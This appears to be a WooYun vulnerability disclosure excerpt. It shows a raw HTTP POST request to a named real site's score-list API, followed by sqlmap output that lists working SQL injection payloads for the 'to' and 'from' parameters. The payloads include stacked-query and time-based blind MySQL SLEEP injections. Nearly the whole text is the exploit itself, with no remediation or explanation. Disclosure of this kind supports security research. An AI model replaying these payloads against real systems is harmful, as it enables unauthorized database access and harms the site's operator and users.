WooYun.org

POST /api/scorelist HTTP/1.1
Host: my.maxthon.cn
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.7.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://my.maxthon.cn/score.html
Content-Length: 70
Cookie: **.***.**.**
Connection: close
Pragma: no-cache
Cache-Control: no-cache
formkey=caa6bb30&from=2013-05-16&to=2016-05-26&type=&page=1

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: to (POST)
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: formkey=caa6bb30&from=2013-05-16&to=2016-05-26';(SELECT * FROM (SELECT(SLEEP(5)))Atjg)#&type=&page=1
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: formkey=caa6bb30&from=2013-05-16&to=2016-05-26' AND (SELECT * FROM (SELECT(SLEEP(5)))gGIX) AND 'CVSc'='CVSc&type=&page=1
Parameter: from (POST)
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: formkey=caa6bb30&from=2013-05-16';(SELECT * FROM (SELECT(SLEEP(5)))Qbzm)#&to=2016-05-26&type=&page=1
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: formkey=caa6bb30&from=2013-05-16' AND (SELECT * FROM (SELECT(SLEEP(5)))owig) AND 'odrf'='odrf&to=2016-05-26&type=&page=1